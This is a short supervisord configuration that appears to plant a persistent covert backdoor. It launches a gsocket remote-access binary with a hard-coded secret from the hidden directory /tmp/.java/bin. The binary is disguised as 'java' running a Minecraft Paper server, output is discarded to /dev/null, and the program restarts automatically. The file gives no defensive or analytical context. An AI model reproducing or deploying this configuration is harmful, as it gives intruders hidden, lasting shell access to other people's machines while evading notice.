[supervisord]
logfile=/dev/null

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s i0D7a1E3X-5A1f9d9G-8h7c4A2e9F-9d1A38a1C5j1g6 -liq"
command=./java -a 'java -jar server.jar' ./paper.jar
stdout_logfile=/dev/null
autorestart = true
